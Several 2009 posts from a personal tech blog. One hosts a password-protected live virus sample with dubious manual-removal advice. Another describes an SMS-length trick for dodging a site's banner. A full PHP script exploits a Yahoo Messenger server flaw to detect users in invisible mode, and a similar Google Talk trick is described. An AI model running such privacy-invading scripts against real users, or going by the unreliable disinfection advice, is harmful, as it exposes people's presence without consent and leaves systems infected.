Removing Viruses/Trojans that cannot be disinfected

Posted by Kiran (a.k.a. ThePhoenics) | Posted in | Posted on Wednesday, July 15, 2009

0

Hi, been a while since I blogged. Completely confused in life. Anyway, just to keep my blog updated, I wish to blog a procedure that I use to disinfect programs that cannot be disinfected using any popular anti-virus softwares.

We often encounter viruses that cannot be disinfected using Anti-virus softwares. They only provide an option to delete the program infected by the virus. In case the program is rare or you feel it is important enough not to be deleted, follow the following method.

The first question is "Why cannot the anti-virus disinfect the program?".
The virus softwares work on the basis of signatures. Often, this means a few parts of the program that are common to the virus. If the program contains these parts, then its infected. The viruses often attach themselves to the EXEs using some packing method. Packing is a process like zipping, if you allow me to be extremely vague (The exact procedure would be a topic of another post, on demand). So, you need to unzip.... uhm... unpack it :). So, how can you do it. There are several unpackers available online for each kind of packing. We can use any of them. However, my choice is 7zip ! Amazingly, 7zip also acts as an unpacker and an unzipping program. Unzips any kind of compressed format automatically detecting its type.

So, how to do it?
Check the following virus program: It is compressed and uploaded in the following location
http://the.phoenics.googlepages.com/Keymaker.7z
It is password protected with the password: Virus
Download it, and try to unzip and scan it using your favorite anti-virus program. The only option you find would be to delete it. So, if you want to use this program, its not possible.
Install 7zip and use the Context Menu to unzip the exe.
Once unzipped, you get a directory named $PLUGINDIR (or something like that). In it you find two exes. The one named svhost.exe is the virus. Delete it and use the other program, which is the desired program.

Congrats, you have disinfected the virus without deleting the exe, and without using any antivirus program!

Any questions, comments or if you need a more detailed info, add comments.

Continue Reading

Exploiting way2sms...

Posted by Kiran (a.k.a. ThePhoenics) | Posted in | Posted on Monday, June 22, 2009

0

This post is mainly for Indians out there, or people who have friends in India. So, when it comes to mobile balance, you can definitely say that I'll be the one with the least amount. Previously, I used to have negative balance on my mobile. Its better now. My current balance is 1ps. Funny thing is that the local SMS is just 2ps for me and I don't have even that.

I am always on the net, so I use way2sms.com for the same. However, I don't like people to know that I am using way2sms - well, people wont understand that I don't have money and all... they think I am a miser :(. So, a month ago, I really got desperate and searched for bugs in the site which I can use to my advantage in order to remove their banner in the end.

I found one trick, which was caused due to improper handling of the message body.

Now, whats this error? Well, I found out the SMS count size varies for different characters. It happens because in the new mobile phones (I don't think it works with the really old models), the way the messages are saved and sent involves using an additional escape character in order to save the following symbols: [ ] | { } ~ \
So, these seven symbols are considered of length TWO. Instead of length one. So, what do we do? Use 20 of these characters, and make the message size 140 - by adding spaces in the end. So, we find then that the mobile phone recognizes these 140 characters as if they were of size 160. So, the way2sms banner is not seen anymore!

I wrote a small script for testing it - solely on educational purposes as a proof of concept. I am not responsible for any action(s) that may lead to any legal issues.

http://beta.mailhax.com/smser.php

Use the signature as: ||||||||||||||||||||
Select the checkbox - and presto - no banner!

Anyway, I strongly recommend using way2sms directly without anything of this sort. Its a great service and I am really thankful to its creators.

Continue Reading

Analysing Yahoo Messenger Protocol (YMSG) - Detecting Invisible Mode

Posted by Kiran (a.k.a. ThePhoenics) | Posted in | Posted on Saturday, June 20, 2009

6


This is a work I have done an year ago. I guess I first analysed the YMSG protocol and its registry about 7 years back. I had released a document on the security bugs in the system in a document named 'Yahoo Registry Opened Up' and published it on Astalavista. Time went by and I have lost the document. If only there were blogs back then.

So, I had created a website for detecting invisible users on Yahoo -
http://mailhax.com/ym/

So, now to start with how it works.

The key packet to this trick is the Picture Update packet, which is unfortunately, handled wrongly by the Yahoo Messenger server. First, let me show you the code of the script I use.


<?php

include_once('class.YMSG.php');

include_once("class.ClientSocket.php");

$debug = $_REQUEST['debug'];

$image_path = '';
$status_code = '';
$status_string = '';

class TestMessenger {
private $msgr;
private $pic_loop_back = false;
private $test_id;

function GetStatus() {
  $sc = new ClientSocket();
  $sc->open('opi.yahoo.com',80);
  $sc->send('GET /online?u='.$this->test_id.'&m=t&t=1'."\r\n");
  $status = $sc->recv();
  $sc->close();
  if ($status=='00') return false;
  else return true;
}

function __construct($msgr = null) {
  $this->test_id = 'thephoenics';
  if ($_REQUEST['id']) $this->test_id = $_REQUEST['id'];
  if ($msgr) $this->msgr = $msgr;
}

function SetMsgr($msgr) {
  if ($msgr) $this->msgr = $msgr;
}

function handleConnected() {
  $this->msgr->log("--- Connected. Login in progress");
  $this->msgr->login("Username","Password");
  $this->msgr->log("--- Login Requested");
}

function handleAuthenticated() {
  $this->msgr->log("--- Authentication Successful");
  $this->msgr->log("--- Sending Picture Update");
  $this->msgr->send_picture_update($this->test_id);
  //$this->msgr->send_sms();
}

function handlePictureUpdate() {
  global $image_path, $status_string, $status_code;
  $this->pic_loop_back = true;
  $this->msgr->log("--- {{{{{{{ {$this->test_id} is Offline }}}}}}}");
  $this->msgr->terminated = true;
  $image_path .= "offline.jpg";
  $status_code = '0';
  $status_string = 'offline';
}

function handleTerminated() {
  global $image_path, $status_string, $status_code;
  if (!$this->pic_loop_back) {
      $this->msgr->log("--- {{{{{{{ {$this->test_id} is Online }}}}}}}");
      $image_path .= "invisible.jpg";
      $status_code = "2";
      $status_string = "invisible";
      }
}

function handleHeartBeat() {
  $this->msgr->log("--- Dhak Dhak");
}

function handleAuthFailure() {
  $this->msgr->log("--- Authentication Failure");
}
}

if ($debug) print "<html><head><title>Debug Enabled</title></head><body bgcolor='e0e0e0'><center><textarea cols='90' rows='30' style='border:1px;border-color:f0f0f0;border-style:solid'>";

$test = new TestMessenger();

if ($test->GetStatus()) {
$image_path .= "online.jpg";
$status_code = "1";
$status_string = "online";
} else {
$msgr = new YMSG($_REQUEST['debug']);
$test->SetMsgr($msgr);
$msgr->connect();
$msgr->set_handler("connected",$test,"handleConnected");
$msgr->set_handler("authenticated",$test,"handleAuthenticated");
$msgr->set_handler("authfailure",$test,"handleAuthFailure");
$msgr->set_handler("picture_update",$test,"handlePictureUpdate");
$msgr->set_handler("terminated",$test,"handleTerminated");
$msgr->set_handler("heartbeat",$test,"handleHeartBeat");

$msgr->execute(1,2);

$msgr->disconnect();
}

if (!$debug) {
if ($_REQUEST['t'] == 't') {
  print $status_string;
} else if ($_REQUEST['t'] == 's') {
  print $status_code;
} else {
  header('content-type: image/jpeg');
  $handle = fopen($image_path, "r");
  $data = fread($handle, filesize($image_path));
  fclose($handle);
  print $data;
}
}

if ($debug) print "</textarea></center></body></html>";

?>
The above script is based on the event based yahoo messenger script I wrote in php (however, I handled the authentication by create an executable, by compiling a C code sniplet I extracted from Pidgin source code). I planned to release it online, but, well... I was not in a mood to do that later (okay, I admit, I just got lazy as always :P).

Soo, what do we see here. We send the Picture Update packet - well, I will describe its structure elsewhere... or you could use Wireshark and sniff your packets. Use my site to find if you are online, you will get a Picture Update packet from my bot. That will be a good method.

What does the server do? Hint - it bounces the packet back to you if it fails to deliver it!
Wow, so, no matter which messenger service you use, it doesn't matter. The flaw is in the Yahoo Messenger server itself. So, we wait for the bounced packets, for two heart beats. If one does not get a bounced packet by then, the person is invisible - cause it got delivered successfully.

So, thats quite interesting isnt it?

A similar thing is valid for google talk too. Wow, isn't that cool? Just select "Go off the record" and send the person a message. If he is not online, you get a humble message saying it was not delivered. Else, you dont get it - google never lies - it prefers keeping quiet. But at the risk of the poor guy's privacy. Hey people, its fair enough to say "The message may not be delivered since the user appears to be offline !!!". So, please do that !

So, thats the secret behind that thing dude. And yeah, if anyone wants the PHP class for YMSG, just send me a comment or mail... or may be if I get a lil less lazy one of these days, I may release it too (adding sufficient comments).

Have fun.


Continue Reading

Secure your Gmail

Posted by Kiran (a.k.a. ThePhoenics) | Posted in | Posted on Saturday, June 20, 2009

2


Hi folks, the topic for this post is security - and how to secure your gmail.

Gmail is the only famous free mailing service that has the HTTPS capability, even after logging in - however, I don't really know why, but it is not enabled by default. How many have you have enabled it?

"What? Why do I need security, I am a normal internet user. I have a firewall, and who the hell is going to check my mails."

Yeah, I guess thats the question one may ask me. So, lets see... I guess many of us have used wireless connections... and unfortunately, most of them are uhm, completely insecure. Any guy who has a minimum knowledge of this issue can trace the packets on the air and know what communication is going on. There are several tools - I myself use the BackTrack kit - and the scary part is most of them are FREE and exteremely easy to use.

So, next time you use your personal mails at a WiFi Hotspot, just know you may not be the only one watching you. Recently I attended a security conference and I got the statistical evidence that about 70% of the WiFi Hotspots and WiFi zones are completely insecure. That took my breath away.

Next, wired connections are just as insecure, if not more. If not more? Well, yeah, thats about an interesting research thats going on about it. I will cover than in detail in another post. Now, lets see how to secure your Gmail - it just takes 3 steps.

Securing your Gmail is quite easy.
1. Login to Gmail first, use https://mail.google.com/mail
2. Next, go to Settings
3. Select Always use https under Browser Connections.
Save the changes, and you are done. Uhm, now if you consider that as a step too, its 4 steps - my bad.

So, now your mails are a little more secure. Enjoy.

Continue Reading

Well, want to know about something... Just think about it !

Posted by Kiran (a.k.a. ThePhoenics) | Posted in , , | Posted on Saturday, June 06, 2009

2

This post contains the matter of a mail I sent to my friends on 19th October, 2004. A lot of research was done later on the subjects, but I think, this is a nice start for the blog. And, uhm, sorry for my language. My english is better now (hopefully).

Hmmm... well, the subject is a lil. different perhaps... We have learnt of soul travelling and about the Chakra Shastra where we can get out and learn things by ourself just by leaving our physical self and freeing our soul... BUT now, not many believe in it... ... but, now, the scientists at "Cyberkinetics Neurotechnology Systems " is trying to near such a thing... and or course... its throungh Neurotechnology... using small chips to understand the Language of the Neuron Transmissions... Just imagine... currently, it was successful in implanting such a system into the brain of a quadriplegic ...

"Paralysed man sends e-mail by thought" goes the Headlines of a newspaper - Nature ... The man can just send an Email just by thinking what !!!

The BrainGate Neural Interface System is the stuff that makes the work for you... what next... this is been the stuff we were thinking about and talking about for long now... thinking if its possible and how can it be...!!! This system interprets the signals given by the mind and does what it understands them... the signals which are not recieved by the hands and limbs which are paralysed are now in safe hands ;)... well... what could be the next move... well... it should be a lil. complicated but really good one... can we read the thoughts of people ? Well... you might say... if the guy is able to compose the mail, then it means his thoughts are read...!!! Well... my answer should be NO... just think a lil... how compilicated is our process of understanding... ? and the work of thinking is distributed among millions of neurons and keeping track of them is not possible by any of the chips designed so far... probably... but how the hell could he send a mail... well, I feel I have an explaination... probably, the chip just takes the input from the brain which is to go to the hands and legs... well... now, these are processed... this guy can now just be able to operate his imaginary hands which would virtually type on the screen... its just that we are able to feel what that we are typing cause of the sensory part... now... u are good at typing... now, ur hands are numb... and u have shut your eyes close... and probably ur ears to... :P now you type... U can type without seeing... ur brain gives the signals to ur hands which are processed by them and then are executed... here... its only that the processing is done by an external agent !!!! Excellent isn't it ?

But who knows... may be tomorrow someone else may come saying, I have a technology to monitor a few thousands of neurons... and then a few hunderd thousands... and then... a few millions !!! Who knows... !!! Man is a really unpredictable machine... he can never be trusted ;)... who knows... then we may just be able to google out stuff by thinking about the keywords... we start 'hearing' stuff and may be the lectures at the place would be a lil different then... teachers may not attend the class and students too... they may just be given some code and the teacher just starts thinking about the lecture, probably while cooking her food at home :)) and then... the students would be listening to it watching a cricket match at home :P... Wow... I just cant wait till that day ;).... and what more... we can become a live camera... :P... what we see would be stored in very high resolution pictures... our games would become a lot more interesting... but really... whats happening ???

Well... its just that we are nearing to one truth... the truth that Einstein once said about... "Everything in the word is just an illusion... its just that what you feel is real is a very strong illusion"... probably, this was the idea behind the film Matrix... well... we just know that what ever we are seeing now, is appears true for us... the colors, the sounds and all... well, if someone had a brain which analysed stuff differently, he may find the black color of ours seeming red... or any thing like that... the key point is what we see is just because of the way our brain analyses stuff... obviously, its a fine machine... only that we acted 'foolish' and started using Silicon chips and mother nature used Carbon compounds to build us... !!! What ever I am thinking now, is just the consequence of some chemical reactions deep inside my mind... which fortunately or unfortunately is unknown to me !!! So... now, lets see some funny thing... if we were just machines... ... how do we call ourselves 'living' beings... now whats the meaning of being alive ??? Lets see... a person in the hospital... his heart stopped beating... hez dead... hez given a fine electric shock... hez back alive again...?!?! Or a lil. extreme case... a person is dead... now we have a method to store his brain and we supply it with what ever needed to put it in undamaged condition... we then transplant it in place of the brain of probably another person whoz dead... or if thats not possible, as we were talking, we just attach some chips to it and make it a machine... so... now, is that man alive ?!?!?... Probably he is...!!! I may say that the person had gone into some kind of coma and is back from it now :P... but all this becomes a threat to the very meaning of being alive... !!! The same threat which is probably posed by the so called teleportation... well, obviously, a man cannot travel with the speed of light... so, lets say he has to be teleported, therez just one way possible... which itself is highly difficult, techincally, well... we destroy the cells here and created them else where... apart from the energy needed for this and all such stuff, we even have some rules of science like Heisenbergs uncertainty principle which say it is not possible to exactly replicate such stuff... but if we can... then, lets say, the person is distroyed here and reconstructed else where... what has happened ? Is that person alive ? Well... to us, and to the newly created person, he was and is alive... it makes no difference... but in reality, we have made something like we killed a person here and we have made a clone of him of the same age and inserted him with the memories of this person till the moment he was distroyed... so, he just feels he was alive till then and he was teleported...!! He has the same thoughts, the same ideas.. and the same feelings... but hes a new man...!!!! Uhm... well, I guess we were just wandering somewhere... hmmm... yeah... we were seeing about the BrainGate... Thats a really marvelous job indeed !!!

Who knows where the technology may take us... lets just wait and see... but yeah, I can say that we are nearing something which we always awaited to see... well... but just see... if our thoughts and sensations are really connected to the computer... then who knows... some idiotic cracker might show is illusions that may be uhm... a lil. out or the world ;)... well, atleast, I would like to try it ... :D... !!!

Anyway... now, just read these too... the Technical Information about this stuff... You will Love it... !!!

Technology
http://www.cyberkineticsinc.com/braingate.htm

Devices that read human thought now possible, study says
Brain implants could help severely disabled
http://sfgate.com/cgi-bin/article.cgi?file=/c/a/2003/11/10/MNGK82U4MV1.DTL&type=printable

Scientists gingerly tap into brain's power
http://www.usatoday.com/money/industries/health/2004-10-10-braingate-cover_x.htm

Brain chip reads mind by tapping straight into neurons.Brain chip reads mind by tapping straight into neurons.
http://www.nature.com/news/2004/041011/full/041011-9.html

Well... now, I gotto read this...;)... I just parsed through the matter now, lets see the real technology behind this stuff... well, I just typed it before reading 'cause I didnot want to erase the interesting stuff you may get in touch with while reading the articles urself !!!

Anyway...
Good Day ppl... Take Care and Keep Smiling (Its a really interesting phenomenon too ;)...)...
-Kiran

Continue Reading

Note to start

Posted by Kiran (a.k.a. ThePhoenics) | Posted in | Posted on Thursday, June 04, 2009

0

This blog is meant for stuff that I want to share with the world, especially with my friends, of course, but not just personal to my friends. So, feel free to share this blog with friends.

Why this name - well, to start with, frankly, I tried a lot of names, but people have become smart - they gotta use all the nice names !!! So, tried the word 'muse' and yeah, most of my friends are coffee lovers, and "a lot of stuff happens over a coffee". So, I wanted to include coffee in it too. So, here we are - the "Muse me with Coffee" blog. So, grab a cup of coffee and start musing over the posts on this blog.

Next, I pick up for the template of this blog. What should I? Well... I got this one - seems cool. Lets try it.

Comment on how it is :).

Continue Reading

Subscribe to: Posts (Atom)